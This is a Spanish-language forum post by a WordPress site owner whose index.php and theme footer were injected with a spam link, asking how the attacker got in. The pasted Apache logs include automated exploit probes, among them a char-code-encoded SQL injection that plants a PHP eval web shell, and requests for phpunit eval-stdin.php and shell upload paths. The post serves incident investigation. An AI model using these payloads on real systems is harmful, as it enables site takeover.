Me desperté hoy para ver las páginas superior e inferior de mi sitio web que muestran un enlace con el texto "Envío gratuito de camisetas baratas".
Entré rápidamente y vi que se modificaron /index.php y /wp-content/themes/Avada/footer.php, eliminé los enlaces y los guardé.
Quiero saber cómo la persona tuvo acceso a ambos archivos para poder solucionarlo. He buscado en todos los lugares que puedo, ¿alguien puede, por favor, hacerme saber dónde buscar?
Así es como se veía mi index.php antes de que lo arreglara:
<a href="http://www.example.com">Cheap Jerseys Free Shipping</a>
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
He asegurado mi sitio de Wordpress siguiendo la guía de fortalecimiento de Wordpress. El sitio está alojado en Amazon Lightsail.
- Dos usuarios tienen acceso a través de SSH me con sudo y Vaultpress tiene Acceso limitado al directorio / web. El acceso SSH está vinculado al correo electrónico instantáneo notificación, tan pronto como alguien acceda a través de SSH un el correo electrónico se envía con IP, los registros de acceso muestran que no se ha otorgado acceso ssh.
- Dos usuarios de FTP que tienen acceso de acceso de solo lectura limitado a / web / downloads / and / web / update directory only
- Sólo 1 usuario en Wordpress, la contraseña ahora cambió. / wp-admin tiene Permiso de orden, negar Permitir de todo Satisfaga cualquiera y autenticación de contraseña donde el archivo de contraseña está en una .directorio; AuthType Basic AuthName "Sólo administradores" AuthUserFile "/var/www/.xxx/xxxx/xxxxxx-xx-xxx" requiere un usuario válido wp-config.php en / directorio tiene orden permitir, negar negar de todo
- Todos los accesos a través de firewall están bloqueados, excepto ssh, 22, 80 y 443. El acceso a la base de datos está limitado a solo local.
- El Administrador de etiquetas de Google no se modificó y solo incluye enlaces a Analytics, Adwords y analíticas de clic específicas.
Los registros de acceso (acceso web de apache) que parecían sospechosos se encuentran a continuación, aunque no sé lo que significan. Las copias de seguridad de Vault Press muestran que el cambio ocurrió entre el 28 de agosto (2:38 AM) y el 29 de agosto (2:38 AM)
27.24.xx.xxx - - [27/Aug/2018:11:20:17 +0000] "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=97&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=114&arrs2[]=101&arrs2[]=97&arrs2[]=100&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=120&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=109&arrs2[]=79&arrs2[]=111&arrs2[]=110&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=57&arrs2[]=32&arrs2[]=35 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:23 +0000] "GET /plus/ad_js.php?aid=19 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:31 +0000] "GET /include/dialog/select_soft_post.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:33 +0000] "GET /data/cache/asd.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:39 +0000] "GET /install/index.php.bak?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:20:41 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 94621
95.108.xxx.xx - - [27/Aug/2018:11:20:41 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/ HTTP/1.1" 200 103653
141.8.142.161 - - [27/Aug/2018:11:20:44 +0000] "GET /wp-content/themes/Avada/includes/lib/assets/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 65580
95.108.xxx.xx - - [27/Aug/2018:11:20:44 +0000] "GET /blog/xxx-xxx-xxxx-saves-lives/?relatedposts=1 HTTP/1.1" 200 1426
27.24.21.214 - - [27/Aug/2018:11:20:44 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/asd.php HTTP/1.1" 404 94621
66.249.xxx.xx - - [27/Aug/2018:11:20:48 +0000] "GET /blog/xxx-xxx-xxxx-tool/ HTTP/1.1" 200 105062
27.24.xx.xxx - - [27/Aug/2018:11:20:51 +0000] "GET /index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 301 5880
27.24.xx.xxx - - [27/Aug/2018:11:20:53 +0000] "GET /?m=member&c=index&a=register&siteid=1 HTTP/1.1" 200 95434
27.24.xx.xxx - - [27/Aug/2018:11:20:57 +0000] "GET /search.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:01 +0000] "GET / HTTP/1.1" 200 103770
27.24.xx.xxx - - [27/Aug/2018:11:21:07 +0000] "GET /index.php?s=/Core/File/uploadPictureBase64.html HTTP/1.1" 200 97157
27.24.xx.xxx - - [27/Aug/2018:11:21:26 +0000] "GET /install.php?finish=1 HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:29 +0000] "GET /da.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:36 +0000] "GET /dayrui/libraries/Chart/ofc_upload_image.php?name=shell9257.php HTTP/1.1" 404 94621
27.24.xx.xxx - - [27/Aug/2018:11:21:43 +0000] "GET /dayrui/libraries/tmp-upload-images/shell9257.php HTTP/1.1" 404 94621
128.77.xxx.xxx - - [29/Aug/2018:10:31:25 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:27 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98345
128.77.xxx.xxx - - [29/Aug/2018:10:31:33 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
128.77.xxx.xxx - - [29/Aug/2018:10:31:35 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98330
128.77.xxx.xxx - - [29/Aug/2018:10:31:40 +0000] "GET /wp-admin HTTP/1.1" 401 735
80.122.xx.xx - - [29/Aug/2018:10:31:42 +0000] "GET / HTTP/1.1" 200 103865
66.249.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /robots.txt HTTP/1.1" 200 6059
80.122.xx.xxx - - [29/Aug/2018:10:31:49 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
66.249.xx.xxx - - [29/Aug/2018:10:31:50 +0000] "GET /blog/author/scott-baird/ HTTP/1.1" 301 553
80.122.xx.xx - - [29/Aug/2018:10:31:51 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98482
80.122.xx.xx - - [29/Aug/2018:10:31:57 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
80.122.xx.xx - - [29/Aug/2018:10:31:59 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98478
80.122.xx.xx - - [29/Aug/2018:10:32:03 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:15 +0000] "GET / HTTP/1.1" 200 103705
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
95.105.xxx.xxx - - [29/Aug/2018:10:32:27 +0000] "GET / HTTP/1.1" 200 103701
95.105.xxx.xxx - - [29/Aug/2018:10:32:30 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98347
95.105.xxx.xxx - - [29/Aug/2018:10:32:35 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:37 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:41 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 510
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /index.php?cperpage=1 HTTP/1.1" 301 5879
192.0.xxx.xxx - - [29/Aug/2018:10:32:44 +0000] "HEAD / HTTP/1.1" 200 5846
95.105.xxx.xxx - - [29/Aug/2018:10:32:43 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98332
95.105.xxx.xxx - - [29/Aug/2018:10:32:49 +0000] "GET /wp-admin HTTP/1.1" 401 735
95.105.xxx.xxx - - [29/Aug/2018:10:32:45 +0000] "GET /?cperpage=1 HTTP/1.1" 200 98325
95.105.xxx.xxx - - [29/Aug/2018:10:32:51 +0000] "GET /wp-admin HTTP/1.1" 401 735
77.72.xxx.xxx - - [29/Aug/2018:10:33:12 +0000] "POST /wp-login.php HTTP/1.1" 200 10257
60.191.xxx.xxx - - [29/Aug/2018:10:33:17 +0000] "GET / HTTP/1.1" 200 84011/wp-admin/tools.php?page=string-locator&edit-file=index.php&file-reference=&file-type=core&string-locator-line=1&string-locator-path=%2Fvar%2Fwww%2Fmy-site%2Findex.php HTTP/1.1" 200 19947
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons,admin-bar,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-pointer,widgets&load%5B%5D=,site-icon,l10n,buttons,wp-auth-check,wp-jquery-ui-dialog,wp-color-picker,code-editor&ver=4.9.8 HTTP/1.1" 200 86794
119.my.ip - - [29/Aug/2018:14:38:17 +0000] "GET /wp-content/plugins/string-locator//resources/js/string-locator.js?ver=2.3.1 HTTP/1.1" 200 1119
119.my.ip - [email protected] [29/Aug/2018:14:38:17 +0000] "GET /wp-admin/load-scripts.php?c=0&load%5B%5D=jquery-core,jquery-migrate,utils,jquery-ui-core,jquery-ui-widget,jquery-ui-mouse,jquery-ui-sortable,underscore,wp-codemirror&ver=4.9.8 HTTP/1.1" 200 238028
119.my.ip - - [29/Aug/2018:14:38:20 +0000] "GET /wp-json/jetpack/v4/jitm?message_path=wp%3Atools_page_string-locator%3Aadmin_notices&query=page%253Dstring-locator%252Cedit-file%253Dindex.php%252Cfile-reference%253D%252Cfile-type%253Dcore%252Cstring-locator-line%253D1%252Cstring-locator-path%253D%25252Fvar%25252Fwww%25252Fmy-site%25252Findex.php&_wpnonce=e419c5f949 HTTP/1.1" 200 819
119.my.ip - [email protected] [29/Aug/2018:14:37:55 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 880
161.249.xxx.xx - - [29/Aug/2018:14:38:51 +0000] "-" 408 152
119.my.ip - [email protected] [29/Aug/2018:14:39:20 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 795
119.my.ip - [email protected] [29/Aug/2018:15:07:02 +0000] "GET /wp-admin/index.php HTTP/1.1" 200 25953
La información de mi sitio de wordpress
Avada Versions:
### Avada Versions ###
Current Version: 5.6.2
Previous Version: 5.5.2 5.6.0 5.6.1
### WordPress Environment ###
Home URL: https://www.my-site.com
Site URL: https://www.my-site.com
WP Content Path: /var/www/my-site/wp-content
WP Path: /var/www/my-site/
WP Version: 4.9.8
WP Multisite: –
PHP Memory Limit: 512 MB
WP Debug Mode: –
Language: en_US
### Server Environment ###
Server Info: Apache/2.4.18 (Ubuntu)
PHP Version: 7.0.30-0ubuntu0.16.04.1. WordPress recommendation: 7.2 or above. See WordPress Requirements for details.
PHP Post Max Size: 32 MB
PHP Time Limit: 0
PHP Max Input Vars: 3000
MySQL Version: 5.7.23
Max Upload Size: 20 MB
DOMDocument: ✔
WP Remote Get: ✔
WP Remote Post: ✔
GD Library: 2.1.1
## Active Plugins (11) ###
VaultPress: by Automattic
LayerSlider WP: by Kreatura Media
Akismet Anti-Spam: by Automattic
Contact Form 7 - ZOHO CRM: by Obtain Code
Contact Form 7: by Takayuki Miyoshi
Fusion Builder: by ThemeFusion
Fusion Core: by ThemeFusion
Jetpack by WordPress.com: by Automattic
Slider Revolution: by ThemePunch
Yoast SEO Premium: by Team Yoast
WP Mail SMTP: by WPForms